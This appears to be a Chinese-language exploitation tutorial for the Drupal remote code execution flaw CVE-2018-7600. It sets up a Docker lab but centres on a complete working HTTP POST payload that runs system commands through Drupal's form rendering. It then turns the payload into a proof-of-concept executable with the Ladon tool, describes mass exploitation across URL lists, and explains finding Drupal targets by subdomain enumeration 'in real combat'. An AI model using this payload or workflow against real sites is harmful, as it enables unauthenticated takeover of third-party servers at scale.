漏洞簡介
Drupal是一個開源内容管理系統(CMS),全球超過100萬個網站(包括政府,電子零售,企業組織,金融機構等)使用。兩周前,Drupal安全團隊披露了一個非常關鍵的漏洞,編号CVE-2018-7600 Drupal對表單請求内容未做嚴格過濾,是以,這使得攻擊者可能将惡意注入表單内容,此漏洞允許未經身份驗證的攻擊者在預設或常見的Drupal安裝上執行遠端代碼執行。
漏洞分析
https://research.checkpoint.com/uncovering-drupalgeddon-2/
影響版本
Drupal 6.x
Drupal 7.x
Drupal 8.x
環境搭建
https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7600/README.zh-cn.md
漏洞環境
執行如下指令啟動drupal 8.5.0的環境:
docker-compose up -d
環境啟動後,通路http://your-ip:8080/将會看到drupal的安裝頁面,一路預設配置下一步安裝。因為沒有mysql環境,是以安裝的時候可以選擇sqlite資料庫。
Payload
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
漏洞複現
使用LadonExp.exe生成POC,填寫對應字段,具體參數如下
TargetURL: 目标URL
Addurl: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
Post: form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
隻需以上3個參數即可,點選BuildExe生成EXE,再點選TestEXE測試,如圖所示成功執行ID指令。
PS:Payload中的exec也可換成system、passthru或其它PHP函數
Ladon調用
生成的POC或EXP可使用Ladon調用,單個URL用法如下:
Ladon http://192.168.1.8:8080 LadonPoc.exe
批量利用
由于url不像ip那樣可使用IP/24、IP/XX來批量,是以我們可配置url.txt來批量利用EXP。
Ladon url.txt LadonPoc.exe
CMS識别
實戰時可使用LadonGui的SubDomain來快速擷取目标子域名并識别出使用Drupal的域名,再把對應URL放入url.txt,即可使用Ladon批量EXP。
[外鍊圖檔轉存失敗,源站可能有防盜鍊機制,建議将圖檔儲存下來直接上傳(img-JXDQk8vV-1628004026176)(http://k8gege.org/k8img/Ladon/exe/Ladn85Subdomain.PNG)]
如果已整理好URL,可使用WhatCMS快速識别
Ladon url.txt WhatCMS
Ladon下載下傳
PowerLadon: https://github.com/k8gege/PowerLadon
曆史版本: http://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
8.6版本:K8小密圈